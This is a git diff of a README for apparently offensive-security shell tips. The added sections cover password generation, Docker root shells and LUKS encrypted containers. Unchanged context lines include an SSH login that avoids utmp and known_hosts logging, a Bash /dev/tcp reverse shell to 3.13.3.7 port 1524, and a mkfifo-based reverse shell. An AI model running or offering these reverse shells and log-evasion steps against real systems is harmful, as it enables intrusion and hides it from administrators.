diff --git a/README.md b/README.md index 3dc7169..ffba294 100644 --- a/README.md +++ b/README.md @@ -26,7 +26,7 @@ $ kill -9 $$ ``` $ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i" ``` -This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. On your client side it will stop logging the host name to *~/.ssh/known_hosts*. +This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*. **3. SSH tunnel OUT** @@ -253,7 +253,57 @@ Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (cou # tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ``` -**20. Bash reverse shell** +**20. Generate quick random Password** + +Good for quick passwords without human element. + +``` +$ openssl rand -base64 24 +``` + +**21. Get a root shell in Docker container.** + +If the container is already running: + +``` +$ docker exec -it --user root /bin/bash +``` + +If the container is not running: + +``` +$ docker run -it --user root --entrypoint /bin/bash +``` + +**22. Linux transportable encrypted filesystems.** + +Like truecrypt but better. You may need to `losetup -f` to get a loop device. + +Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password. + +``` +$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock +$ cryptsetup luksFormat /tmp/crypted +$ mkfs.ext3 /tmp/crypted +``` + +Mount: + +``` +# losetup /dev/loop0 /tmp/crypted +# cryptsetup open /dev/loop0 crypted +# mount -t ext3 /dev/mapper/crypted /mnt/crypted +``` + +Store data in `/mnt/crypted`, then unmount: + +``` +# umount /mnt/crypted +# cryptsetup close crypted +# losetup -d /dev/loop0 +``` + +**23. Bash reverse shell** Start netcat to listen on port 1524 on your system: ``` @@ -265,7 +315,7 @@ On the remote system. This Bash will connect back to your system (IP = 3.13.3.7, $ bash -i 2>&1 >& /dev/tcp/3.13.3.7/1524 0>&1 ``` -**21. Reverse Shell without Bash** +**24. Reverse Shell without Bash** Especially embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet: @@ -281,6 +331,7 @@ $ mkfifo /tmp/.io $ sh -i 2>&1 /tmp/.io ``` + -------------------------------------------------------------------------- Shoutz: ADM